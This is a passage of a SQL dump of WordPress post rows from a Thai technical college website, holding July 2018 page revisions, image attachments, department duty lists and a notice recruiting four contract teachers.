(3419, 3, '2018-07-12 14:28:03', '2018-07-12 07:28:03', '<img class=\"aligncenter size-full wp-image-3413\" src=\"/wp-content/uploads/2018/07/12-7-2561-11-32-03.jpg\" alt=\"\" width=\"196\" height=\"243\" /> <img class=\"aligncenter wp-image-3414\" src=\"/wp-content/uploads/2018/07/12-7-2561-11-32-14.jpg\" alt=\"\" width=\"372\" height=\"101\" /> <img class=\"aligncenter size-full wp-image-3420\" src=\"/wp-content/uploads/2018/07/12-7-2561-13-57-34.jpg\" alt=\"\" width=\"881\" height=\"631\" />', 'วิทยาศาสตร์', '', 'inherit', 'closed', 'closed', '', '3412-autosave-v1', '', '', '2018-07-12 14:28:03', '2018-07-12 07:28:03', '', 3412, 'http://www.technicrayong.ac.th/3412-autosave-v1/', 0, 'revision', '', 0),
(3420, 3, '2018-07-12 13:56:28', '2018-07-12 06:56:28', '', '12-7-2561 13-57-34', '', 'inherit', 'closed', 'closed', '', '12-7-2561-13-57-34', '', '', '2018-07-12 13:56:28', '2018-07-12 06:56:28', '', 3412, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/07/12-7-2561-13-57-34.jpg', 0, 'attachment', 'image/jpeg', 0),
(3421, 3, '2018-07-12 13:57:01', '2018-07-12 06:57:01', '<img class=\"aligncenter size-full wp-image-3413\" src=\"/wp-content/uploads/2018/07/12-7-2561-11-32-03.jpg\" alt=\"\" width=\"196\" height=\"243\" /> <img class=\"aligncenter wp-image-3414\" src=\"/wp-content/uploads/2018/07/12-7-2561-11-32-14.jpg\" alt=\"\" width=\"372\" height=\"101\" /> <img class=\"aligncenter size-full wp-image-3420\" src=\"/wp-content/uploads/2018/07/12-7-2561-13-57-34.jpg\" alt=\"\" width=\"881\" height=\"631\" />', 'วิทยาศาสตร์', '', 'inherit', 'closed', 'closed', '', '3412-revision-v1', '', '', '2018-07-12 13:57:01', '2018-07-12 06:57:01', '', 3412, 'http://www.technicrayong.ac.th/3412-revision-v1/', 0, 'revision', '', 0),
(3422, 3, '2018-07-12 14:25:16', '2018-07-12 07:25:16', '', '12-7-2561 14-25-18', '', 'inherit', 'closed', 'closed', '', '12-7-2561-14-25-18', '', '', '2018-07-12 14:25:16', '2018-07-12 07:25:16', '', 3418, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/07/12-7-2561-14-25-18.jpg', 0, 'attachment', 'image/jpeg', 0),
(3423, 3, '2018-07-12 14:25:21', '2018-07-12 07:25:21', '', '12-7-2561 14-25-37', '', 'inherit', 'closed', 'closed', '', '12-7-2561-14-25-37', '', '', '2018-07-12 14:25:21', '2018-07-12 07:25:21', '', 3418, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/07/12-7-2561-14-25-37.jpg', 0, 'attachment', 'image/jpeg', 0),
(3424, 3, '2018-07-12 14:25:25', '2018-07-12 07:25:25', '', '12-7-2561 14-26-57', '', 'inherit', 'closed', 'closed', '', '12-7-2561-14-26-57', '', '', '2018-07-12 14:25:25', '2018-07-12 07:25:25', '', 3418, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/07/12-7-2561-14-26-57.jpg', 0, 'attachment', 'image/jpeg', 0),
(3427, 3, '2018-07-12 15:53:00', '2018-07-12 08:53:00', '<img class=\"aligncenter size-full wp-image-3434\" src=\"/wp-content/uploads/2018/07/12-7-2561-15-47-07.jpg\" alt=\"\" width=\"193\" height=\"243\" /> <img class=\"aligncenter wp-image-3435\" src=\"/wp-content/uploads/2018/07/12-7-2561-15-47-22.jpg\" alt=\"\" width=\"379\" height=\"101\" /> <img class=\"aligncenter size-full wp-image-3436\" src=\"/wp-content/uploads/2018/07/12-7-2561-15-51-10.jpg\" alt=\"\" width=\"962\" height=\"619\" /> <img class=\"aligncenter size-full wp-image-3437\" src=\"/wp-content/uploads/2018/07/12-7-2561-15-53-26.jpg\" alt=\"\" width=\"956\" height=\"618\" />', 'ภาษาต่างประเทศ', '', 'publish', 'closed', 'closed', '', '%e0%b8%a0%e0%b8%b2%e0%b8%a9%e0%b8%b2%e0%b8%95%e0%b9%88%e0%b8%b2%e0%b8%87%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%97%e0%b8%a8', '', '', '2018-07-12 15:53:00', '2018-07-12 08:53:00', '', 0, 'http://www.technicrayong.ac.th/?page_id=3427', 0, 'page', '', 0),
(3428, 3, '2018-07-12 14:28:38', '2018-07-12 07:28:38', '<img class=\"aligncenter size-full wp-image-3422\" src=\"/wp-content/uploads/2018/07/12-7-2561-14-25-18.jpg\" alt=\"\" width=\"198\" height=\"245\" /> <img class=\"aligncenter wp-image-3423\" src=\"/wp-content/uploads/2018/07/12-7-2561-14-25-37.jpg\" alt=\"\" width=\"375\" height=\"101\" /> <img class=\"aligncenter size-full wp-image-3424\" src=\"/wp-content/uploads/2018/07/12-7-2561-14-26-57.jpg\" alt=\"\" width=\"876\" height=\"329\" />', 'คณิตศาสตร์', '', 'inherit', 'closed', 'closed', '', '3418-revision-v1', '', '', '2018-07-12 14:28:38', '2018-07-12 07:28:38', '', 3418, 'http://www.technicrayong.ac.th/3418-revision-v1/', 0, 'revision', '', 0),
(3429, 3, '2018-07-12 14:28:53', '2018-07-12 07:28:53', '<img class=\"aligncenter size-full wp-image-3422\" src=\"/wp-content/uploads/2018/07/12-7-2561-14-25-18.jpg\" alt=\"\" width=\"198\" height=\"245\" /> <img class=\"aligncenter wp-image-3423\" src=\"/wp-content/uploads/2018/07/12-7-2561-14-25-37.jpg\" alt=\"\" width=\"375\" height=\"101\" /> <img class=\"aligncenter size-full wp-image-3424\" src=\"/wp-content/uploads/2018/07/12-7-2561-14-26-57.jpg\" alt=\"\" width=\"876\" height=\"329\" />', 'คณิตศาสตร์', '', 'inherit', 'closed', 'closed', '', '3418-autosave-v1', '', '', '2018-07-12 14:28:53', '2018-07-12 07:28:53', '', 3418, 'http://www.technicrayong.ac.th/3418-autosave-v1/', 0, 'revision', '', 0),
(3430, 3, '2018-07-12 14:37:29', '2018-07-12 07:37:29', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F07%2F%E0%B8%A3%E0%B8%B1%E0%B8%9A%E0%B8%AA%E0%B8%A1%E0%B8%B1%E0%B8%84%E0%B8%A3%E0%B8%84%E0%B8%A3%E0%B8%B9%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A3%E0%B8%B2%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%87-4-%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A3%E0%B8%B2.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ รับสมัครคัดเลือกบุคคลเพื่อเป็นลูกจ้างชั่วคราว ทำหน้าที่ ครูอัตราจ้าง จำนวน 4 อัตรา', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%a3%e0%b8%b1%e0%b8%9a%e0%b8%aa%e0%b8%a1%e0%b8%b1%e0%b8%84%e0%b8%a3%e0%b8%84%e0%b8%b1%e0%b8%94%e0%b9%80%e0%b8%a5%e0%b8%b7%e0%b8%ad-6', '', '', '2018-07-12 14:37:29', '2018-07-12 07:37:29', '', 0, 'http://www.technicrayong.ac.th/?p=3430', 365, 'post', '', 0),
(3431, 3, '2018-07-12 14:37:06', '2018-07-12 07:37:06', '', 'รับสมัครครูอัตราจ้าง 4 อัตรา', '', 'inherit', 'closed', 'closed', '', '%e0%b8%a3%e0%b8%b1%e0%b8%9a%e0%b8%aa%e0%b8%a1%e0%b8%b1%e0%b8%84%e0%b8%a3%e0%b8%84%e0%b8%a3%e0%b8%b9%e0%b8%ad%e0%b8%b1%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b9%89%e0%b8%b2%e0%b8%87-4-%e0%b8%ad', '', '', '2018-07-12 14:37:06', '2018-07-12 07:37:06', '', 3430, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/07/รับสมัครครูอัตราจ้าง-4-อัตรา.pdf', 0, 'attachment', 'application/pdf', 0),
(3432, 3, '2018-07-12 14:37:29', '2018-07-12 07:37:29', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F07%2F%E0%B8%A3%E0%B8%B1%E0%B8%9A%E0%B8%AA%E0%B8%A1%E0%B8%B1%E0%B8%84%E0%B8%A3%E0%B8%84%E0%B8%A3%E0%B8%B9%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A3%E0%B8%B2%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%87-4-%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A3%E0%B8%B2.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ รับสมัครคัดเลือกบุคคลเพื่อเป็นลูกจ้างชั่วคราว ทำหน้าที่ ครูอัตราจ้าง จำนวน 4 อัตรา', '', 'inherit', 'closed', 'closed', '', '3430-revision-v1', '', '', '2018-07-12 14:37:29', '2018-07-12 07:37:29', '', 3430, 'http://www.technicrayong.ac.th/3430-revision-v1/', 0, 'revision', '', 0),
(3433, 3, '2018-07-12 14:37:42', '2018-07-12 07:37:42', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F07%2F%E0%B8%A3%E0%B8%B1%E0%B8%9A%E0%B8%AA%E0%B8%A1%E0%B8%B1%E0%B8%84%E0%B8%A3%E0%B8%84%E0%B8%A3%E0%B8%B9%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A3%E0%B8%B2%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%87-4-%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A3%E0%B8%B2.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ รับสมัครคัดเลือกบุคคลเพื่อเป็นลูกจ้างชั่วคราว ทำหน้าที่ ครูอัตราจ้าง จำนวน 4 อัตรา', '', 'inherit', 'closed', 'closed', '', '3430-autosave-v1', '', '', '2018-07-12 14:37:42', '2018-07-12 07:37:42', '', 3430, 'http://www.technicrayong.ac.th/3430-autosave-v1/', 0, 'revision', '', 0),
(3434, 3, '2018-07-12 15:52:13', '2018-07-12 08:52:13', '', '12-7-2561 15-47-07', '', 'inherit', 'closed', 'closed', '', '12-7-2561-15-47-07', '', '', '2018-07-12 15:52:13', '2018-07-12 08:52:13', '', 3427, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/07/12-7-2561-15-47-07.jpg', 0, 'attachment', 'image/jpeg', 0),
(3435, 3, '2018-07-12 15:52:17', '2018-07-12 08:52:17', '', '12-7-2561 15-47-22', '', 'inherit', 'closed', 'closed', '', '12-7-2561-15-47-22', '', '', '2018-07-12 15:52:17', '2018-07-12 08:52:17', '', 3427, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/07/12-7-2561-15-47-22.jpg', 0, 'attachment', 'image/jpeg', 0),
(3436, 3, '2018-07-12 15:52:22', '2018-07-12 08:52:22', '', '12-7-2561 15-51-10', '', 'inherit', 'closed', 'closed', '', '12-7-2561-15-51-10', '', '', '2018-07-12 15:52:22', '2018-07-12 08:52:22', '', 3427, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/07/12-7-2561-15-51-10.jpg', 0, 'attachment', 'image/jpeg', 0),
(3437, 3, '2018-07-12 15:52:24', '2018-07-12 08:52:24', '', '12-7-2561 15-53-26', '', 'inherit', 'closed', 'closed', '', '12-7-2561-15-53-26', '', '', '2018-07-12 15:52:24', '2018-07-12 08:52:24', '', 3427, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/07/12-7-2561-15-53-26.jpg', 0, 'attachment', 'image/jpeg', 0),
(3438, 3, '2018-07-12 15:53:00', '2018-07-12 08:53:00', '<img class=\"aligncenter size-full wp-image-3434\" src=\"/wp-content/uploads/2018/07/12-7-2561-15-47-07.jpg\" alt=\"\" width=\"193\" height=\"243\" /> <img class=\"aligncenter wp-image-3435\" src=\"/wp-content/uploads/2018/07/12-7-2561-15-47-22.jpg\" alt=\"\" width=\"379\" height=\"101\" /> <img class=\"aligncenter size-full wp-image-3436\" src=\"/wp-content/uploads/2018/07/12-7-2561-15-51-10.jpg\" alt=\"\" width=\"962\" height=\"619\" /> <img class=\"aligncenter size-full wp-image-3437\" src=\"/wp-content/uploads/2018/07/12-7-2561-15-53-26.jpg\" alt=\"\" width=\"956\" height=\"618\" />', 'ภาษาต่างประเทศ', '', 'inherit', 'closed', 'closed', '', '3427-revision-v1', '', '', '2018-07-12 15:53:00', '2018-07-12 08:53:00', '', 3427, 'http://www.technicrayong.ac.th/3427-revision-v1/', 0, 'revision', '', 0),
(3439, 3, '2018-07-12 15:53:15', '2018-07-12 08:53:15', '<img class=\"aligncenter size-full wp-image-3434\" src=\"/wp-content/uploads/2018/07/12-7-2561-15-47-07.jpg\" alt=\"\" width=\"193\" height=\"243\" /> <img class=\"aligncenter wp-image-3435\" src=\"/wp-content/uploads/2018/07/12-7-2561-15-47-22.jpg\" alt=\"\" width=\"379\" height=\"101\" /> <img class=\"aligncenter size-full wp-image-3436\" src=\"/wp-content/uploads/2018/07/12-7-2561-15-51-10.jpg\" alt=\"\" width=\"962\" height=\"619\" /> <img class=\"aligncenter size-full wp-image-3437\" src=\"/wp-content/uploads/2018/07/12-7-2561-15-53-26.jpg\" alt=\"\" width=\"956\" height=\"618\" />', 'ภาษาต่างประเทศ', '', 'inherit', 'closed', 'closed', '', '3427-autosave-v1', '', '', '2018-07-12 15:53:15', '2018-07-12 08:53:15', '', 3427, 'http://www.technicrayong.ac.th/3427-autosave-v1/', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(3441, 3, '2018-07-12 16:06:20', '2018-07-12 09:06:20', '', '12-7-2561 16-03-55', '', 'inherit', 'closed', 'closed', '', '12-7-2561-16-03-55', '', '', '2018-07-12 16:06:20', '2018-07-12 09:06:20', '', 1757, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/07/12-7-2561-16-03-55.jpg', 0, 'attachment', 'image/jpeg', 0),
(3443, 3, '2018-07-12 16:08:49', '2018-07-12 09:08:49', '', '12-7-2561 16-11-06', '', 'inherit', 'closed', 'closed', '', '12-7-2561-16-11-06', '', '', '2018-07-12 16:08:49', '2018-07-12 09:08:49', '', 1757, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/07/12-7-2561-16-11-06.jpg', 0, 'attachment', 'image/jpeg', 0),
(3444, 3, '2018-07-12 16:11:06', '2018-07-12 09:11:06', '<img class=\"size-full wp-image-1652 aligncenter\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-22-50.jpg\" alt=\"\" width=\"191\" height=\"237\" /><img class=\"wp-image-1650 aligncenter\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-21-54-300x81.jpg\" alt=\"\" width=\"376\" height=\"102\" />\r\n\r\n<img class=\"wp-image-1755 size-full aligncenter\" src=\"/wp-content/uploads/2018/03/12-3-2561-14-57-21.jpg\" alt=\"\" width=\"574\" height=\"318\" />\r\n\r\n<img class=\" wp-image-3441 alignleft\" src=\"/wp-content/uploads/2018/07/12-7-2561-16-03-55.jpg\" alt=\"\" width=\"525\" height=\"86\" />\r\n\r\n \r\n\r\n<img class=\"wp-image-3443 alignleft\" src=\"/wp-content/uploads/2018/07/12-7-2561-16-11-06.jpg\" alt=\"\" width=\"103\" height=\"123\" />\r\n\r\n<img class=\"size-full wp-image-2971 alignnone\" src=\"/wp-content/uploads/2018/06/Trade_01.png\" alt=\"\" width=\"251\" height=\"48\" />\r\n\r\nงานส่งเสริมผลิตผล การค้า และประกอบธุรกิจ มีหน้าที่และความรับผิดชอบดังต่อไปนี้\r\n<ul>\r\n <li style=\"list-style-type: none;\">\r\n<ul>\r\n <li>ส่งเสริมให้ครู นักเรียน นักศึกษา และบุคลากรในสถานศึกษาดำเนินงาน ส่งเสริมผลิตผล จัดทำแผนธุรกิจร่วมกับหน่วยงานภาครัฐและเอกชน ส่งเสริมการทำธุรกิจขนาดย่อม การประกอบอาชีพอิสระเพื่อสร้างรายได้ให้สอดคล้องกับการเรียนการสอน</li>\r\n <li>วางแผน ดำเนินงาน ประสานสัมพันธ์ ร่วมมือกับบุคคล ชุมชน องค์กร ชุมชน องค์กรเอกชน องค์กรวิชาชีพ สถานประกอบการ หน่วยงานของรัฐ และรัฐวิสาหกิจ เพื่อรับงานการค้า รับจัดทำ รับบริการ รับจ้าง ผลิตเพื่อจำหน่าย การหารายได้ระหว่างเรียนการประกอบธุรกิจ และกิจกรรมสหกรณ์</li>\r\n <li>สอบผลิตผลทุกประเภทของสถานศึกษาให้ตรงกับโครงการฝึก จัดทำทะเบียนผลิตผล และจำหน่ายผลิตผล</li>\r\n <li>กำกับ ติดตาม และจัดทำบัญชีรายรับ–รายจ่ายของงานผลิตผล การค้า และธุรกิจ ที่อยู่ในความรับผิดชอบให้เป็นปัจจุบัน และจัดทำรายงานเป็นประจำทุกเดือน</li>\r\n <li>รวบรวมข้อมูล สถิติต่าง ๆ รายรับ–รายจ่ายในการดำเนินงาน เพื่อเป็นข้อมูลในการพิจารณาปรับปรุงแก้ไขพัฒนางาน ให้เกิดประโยชน์ต่อสถานศึกษา</li>\r\n <li>ประสานงานและให้ความร่วมมือกับหน่วยงานต่าง ๆ ทั้งภายในและภายนอกสถานศึกษา</li>\r\n <li>จัดทำปฏิทินการปฏิบัติงาน เสนอโครงการและรายงานการปฏิบัติงานตามลำดับขั้น</li>\r\n <li>ดูแล บำรุงรักษาและรับผิดชอบทรัพย์สินของสถานศึกษาที่ได้รับมอบหมาย</li>\r\n <li>ปฏิบัติงานอื่นตามที่ได้รับมอบหมาย</li>\r\n</ul>\r\n</li>\r\n</ul>\r\n \r\n\r\n<img class=\"wp-image-2972 size-full aligncenter\" src=\"/wp-content/uploads/2018/06/Natee-karnka-1.png\" alt=\"\" width=\"670\" height=\"2212\" />\r\n\r\n.\r\n\r\n ', 'งานส่งเสริมผลิตผล การค้า และประกอบธุรกิจ', '', 'inherit', 'closed', 'closed', '', '1757-revision-v1', '', '', '2018-07-12 16:11:06', '2018-07-12 09:11:06', '', 1757, 'http://www.technicrayong.ac.th/1757-revision-v1/', 0, 'revision', '', 0),
(3445, 3, '2018-07-12 16:13:19', '2018-07-12 09:13:19', '<img class=\"size-full wp-image-1652 aligncenter\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-22-50.jpg\" alt=\"\" width=\"191\" height=\"237\" /><img class=\"wp-image-1650 aligncenter\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-21-54-300x81.jpg\" alt=\"\" width=\"376\" height=\"102\" />\r\n\r\n<img class=\"wp-image-1755 size-full aligncenter\" src=\"/wp-content/uploads/2018/03/12-3-2561-14-57-21.jpg\" alt=\"\" width=\"574\" height=\"318\" />\r\n\r\n<a href=\"https://www.facebook.com/incubator.rtc?fref=pb&hc_location=profile_browser\"><img class=\"alignleft wp-image-3441\" src=\"/wp-content/uploads/2018/07/12-7-2561-16-03-55.jpg\" alt=\"\" width=\"440\" height=\"72\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<a href=\"https://www.facebook.com/incubator.rtc?fref=pb&hc_location=profile_browser\"><img class=\"alignleft wp-image-3443\" src=\"/wp-content/uploads/2018/07/12-7-2561-16-11-06.jpg\" alt=\"\" width=\"78\" height=\"93\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<img class=\"size-full wp-image-2971 alignleft\" src=\"/wp-content/uploads/2018/06/Trade_01.png\" alt=\"\" width=\"251\" height=\"48\" />\r\n\r\n \r\n\r\n \r\n\r\nงานส่งเสริมผลิตผล การค้า และประกอบธุรกิจ มีหน้าที่และความรับผิดชอบดังต่อไปนี้\r\n<ul>\r\n <li style=\"list-style-type: none;\">\r\n<ul>\r\n <li>ส่งเสริมให้ครู นักเรียน นักศึกษา และบุคลากรในสถานศึกษาดำเนินงาน ส่งเสริมผลิตผล จัดทำแผนธุรกิจร่วมกับหน่วยงานภาครัฐและเอกชน ส่งเสริมการทำธุรกิจขนาดย่อม การประกอบอาชีพอิสระเพื่อสร้างรายได้ให้สอดคล้องกับการเรียนการสอน</li>\r\n <li>วางแผน ดำเนินงาน ประสานสัมพันธ์ ร่วมมือกับบุคคล ชุมชน องค์กร ชุมชน องค์กรเอกชน องค์กรวิชาชีพ สถานประกอบการ หน่วยงานของรัฐ และรัฐวิสาหกิจ เพื่อรับงานการค้า รับจัดทำ รับบริการ รับจ้าง ผลิตเพื่อจำหน่าย การหารายได้ระหว่างเรียนการประกอบธุรกิจ และกิจกรรมสหกรณ์</li>\r\n <li>สอบผลิตผลทุกประเภทของสถานศึกษาให้ตรงกับโครงการฝึก จัดทำทะเบียนผลิตผล และจำหน่ายผลิตผล</li>\r\n <li>กำกับ ติดตาม และจัดทำบัญชีรายรับ–รายจ่ายของงานผลิตผล การค้า และธุรกิจ ที่อยู่ในความรับผิดชอบให้เป็นปัจจุบัน และจัดทำรายงานเป็นประจำทุกเดือน</li>\r\n <li>รวบรวมข้อมูล สถิติต่าง ๆ รายรับ–รายจ่ายในการดำเนินงาน เพื่อเป็นข้อมูลในการพิจารณาปรับปรุงแก้ไขพัฒนางาน ให้เกิดประโยชน์ต่อสถานศึกษา</li>\r\n <li>ประสานงานและให้ความร่วมมือกับหน่วยงานต่าง ๆ ทั้งภายในและภายนอกสถานศึกษา</li>\r\n <li>จัดทำปฏิทินการปฏิบัติงาน เสนอโครงการและรายงานการปฏิบัติงานตามลำดับขั้น</li>\r\n <li>ดูแล บำรุงรักษาและรับผิดชอบทรัพย์สินของสถานศึกษาที่ได้รับมอบหมาย</li>\r\n <li>ปฏิบัติงานอื่นตามที่ได้รับมอบหมาย</li>\r\n</ul>\r\n</li>\r\n</ul>\r\n \r\n\r\n<img class=\"wp-image-2972 size-full aligncenter\" src=\"/wp-content/uploads/2018/06/Natee-karnka-1.png\" alt=\"\" width=\"670\" height=\"2212\" />\r\n\r\n.\r\n\r\n ', 'งานส่งเสริมผลิตผล การค้า และประกอบธุรกิจ', '', 'inherit', 'closed', 'closed', '', '1757-revision-v1', '', '', '2018-07-12 16:13:19', '2018-07-12 09:13:19', '', 1757, 'http://www.technicrayong.ac.th/1757-revision-v1/', 0, 'revision', '', 0),
(3446, 3, '2018-07-12 16:14:01', '2018-07-12 09:14:01', '<img class=\"size-full wp-image-1652 aligncenter\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-22-50.jpg\" alt=\"\" width=\"191\" height=\"237\" /><img class=\"wp-image-1650 aligncenter\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-21-54-300x81.jpg\" alt=\"\" width=\"376\" height=\"102\" />\r\n\r\n<img class=\"wp-image-1755 size-full aligncenter\" src=\"/wp-content/uploads/2018/03/12-3-2561-14-57-21.jpg\" alt=\"\" width=\"574\" height=\"318\" />\r\n\r\n<a href=\"https://www.facebook.com/incubator.rtc?fref=pb&hc_location=profile_browser\"><img class=\"alignleft wp-image-3441\" src=\"/wp-content/uploads/2018/07/12-7-2561-16-03-55.jpg\" alt=\"\" width=\"440\" height=\"72\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<a href=\"https://www.facebook.com/incubator.rtc?fref=pb&hc_location=profile_browser\"><img class=\"alignleft wp-image-3443\" src=\"/wp-content/uploads/2018/07/12-7-2561-16-11-06.jpg\" alt=\"\" width=\"78\" height=\"93\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<img class=\"size-full wp-image-2971 alignleft\" src=\"/wp-content/uploads/2018/06/Trade_01.png\" alt=\"\" width=\"251\" height=\"48\" />\r\n\r\n \r\n\r\n \r\n\r\nงานส่งเสริมผลิตผล การค้า และประกอบธุรกิจ มีหน้าที่และความรับผิดชอบดังต่อไปนี้\r\n<ul>\r\n <li style=\"list-style-type: none;\">\r\n<ul>\r\n <li>ส่งเสริมให้ครู นักเรียน นักศึกษา และบุคลากรในสถานศึกษาดำเนินงาน ส่งเสริมผลิตผล จัดทำแผนธุรกิจร่วมกับหน่วยงานภาครัฐและเอกชน ส่งเสริมการทำธุรกิจขนาดย่อม การประกอบอาชีพอิสระเพื่อสร้างรายได้ให้สอดคล้องกับการเรียนการสอน</li>\r\n <li>วางแผน ดำเนินงาน ประสานสัมพันธ์ ร่วมมือกับบุคคล ชุมชน องค์กร ชุมชน องค์กรเอกชน องค์กรวิชาชีพ สถานประกอบการ หน่วยงานของรัฐ และรัฐวิสาหกิจ เพื่อรับงานการค้า รับจัดทำ รับบริการ รับจ้าง ผลิตเพื่อจำหน่าย การหารายได้ระหว่างเรียนการประกอบธุรกิจ และกิจกรรมสหกรณ์</li>\r\n <li>สอบผลิตผลทุกประเภทของสถานศึกษาให้ตรงกับโครงการฝึก จัดทำทะเบียนผลิตผล และจำหน่ายผลิตผล</li>\r\n <li>กำกับ ติดตาม และจัดทำบัญชีรายรับ–รายจ่ายของงานผลิตผล การค้า และธุรกิจ ที่อยู่ในความรับผิดชอบให้เป็นปัจจุบัน และจัดทำรายงานเป็นประจำทุกเดือน</li>\r\n <li>รวบรวมข้อมูล สถิติต่าง ๆ รายรับ–รายจ่ายในการดำเนินงาน เพื่อเป็นข้อมูลในการพิจารณาปรับปรุงแก้ไขพัฒนางาน ให้เกิดประโยชน์ต่อสถานศึกษา</li>\r\n <li>ประสานงานและให้ความร่วมมือกับหน่วยงานต่าง ๆ ทั้งภายในและภายนอกสถานศึกษา</li>\r\n <li>จัดทำปฏิทินการปฏิบัติงาน เสนอโครงการและรายงานการปฏิบัติงานตามลำดับขั้น</li>\r\n <li>ดูแล บำรุงรักษาและรับผิดชอบทรัพย์สินของสถานศึกษาที่ได้รับมอบหมาย</li>\r\n <li>ปฏิบัติงานอื่นตามที่ได้รับมอบหมาย</li>\r\n</ul>\r\n</li>\r\n</ul>\r\n \r\n\r\n<img class=\"wp-image-2972 size-full aligncenter\" src=\"/wp-content/uploads/2018/06/Natee-karnka-1.png\" alt=\"\" width=\"670\" height=\"2212\" />\r\n\r\n.\r\n\r\n ', 'งานส่งเสริมผลิตผล การค้า และประกอบธุรกิจ', '', 'inherit', 'closed', 'closed', '', '1757-revision-v1', '', '', '2018-07-12 16:14:01', '2018-07-12 09:14:01', '', 1757, 'http://www.technicrayong.ac.th/1757-revision-v1/', 0, 'revision', '', 0),
(3447, 3, '2018-07-16 11:03:36', '2018-07-16 04:03:36', '<img class=\"aligncenter size-full wp-image-1766\" src=\"/wp-content/uploads/2018/03/13-3-2561-12-01-14.jpg\" alt=\"\" width=\"190\" height=\"239\" />\n\n<img class=\"aligncenter wp-image-1767\" src=\"/wp-content/uploads/2018/03/13-3-2561-11-07-18-300x84.jpg\" alt=\"\" width=\"376\" height=\"105\" />\n\n<img class=\"aligncenter size-full wp-image-3448\" src=\"/wp-content/uploads/2018/07/16-7-2561-10-54-02.jpg\" alt=\"\" width=\"687\" height=\"324\" />\n<h3><span style=\"color: #0000ff;\">แบบฟอร์ม บันทึกข้อความขอดำเนินโครงการ >> <span style=\"color: #ff0000;\"><a style=\"color: #ff0000;\" href=\"/wp-content/uploads/2018/05/บันทึกข้อความขอดำเนินโครงการเปล่า.pdf\">ไฟล์ PDF</a></span><< >><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/บันทึกข้อความขอดำเนินโครงการเปล่า.docx\"><span style=\"color: #ff0000;\">ไฟล์ Word</span><<</a></span></h3>', 'งานกิจกรรมนักเรียน นักศึกษา', '', 'inherit', 'closed', 'closed', '', '1784-autosave-v1', '', '', '2018-07-16 11:03:36', '2018-07-16 04:03:36', '', 1784, 'http://www.technicrayong.ac.th/1784-autosave-v1/', 0, 'revision', '', 0),
(3448, 3, '2018-07-16 11:03:02', '2018-07-16 04:03:02', '', '16-7-2561 10-54-02', '', 'inherit', 'closed', 'closed', '', '16-7-2561-10-54-02', '', '', '2018-07-16 11:03:02', '2018-07-16 04:03:02', '', 1784, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/07/16-7-2561-10-54-02.jpg', 0, 'attachment', 'image/jpeg', 0),
(3449, 3, '2018-07-16 11:03:26', '2018-07-16 04:03:26', '<img class=\"aligncenter size-full wp-image-1766\" src=\"/wp-content/uploads/2018/03/13-3-2561-12-01-14.jpg\" alt=\"\" width=\"190\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1767\" src=\"/wp-content/uploads/2018/03/13-3-2561-11-07-18-300x84.jpg\" alt=\"\" width=\"376\" height=\"105\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-3448\" src=\"/wp-content/uploads/2018/07/16-7-2561-10-54-02.jpg\" alt=\"\" width=\"687\" height=\"324\" />\r\n<h3><span style=\"color: #0000ff;\">แบบฟอร์ม บันทึกข้อความขอดำเนินโครงการ >> <span style=\"color: #ff0000;\"><a style=\"color: #ff0000;\" href=\"/wp-content/uploads/2018/05/บันทึกข้อความขอดำเนินโครงการเปล่า.pdf\">ไฟล์ PDF</a></span><< >><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/บันทึกข้อความขอดำเนินโครงการเปล่า.docx\"><span style=\"color: #ff0000;\">ไฟล์ Word</span><<</a></span></h3>', 'งานกิจกรรมนักเรียน นักศึกษา', '', 'inherit', 'closed', 'closed', '', '1784-revision-v1', '', '', '2018-07-16 11:03:26', 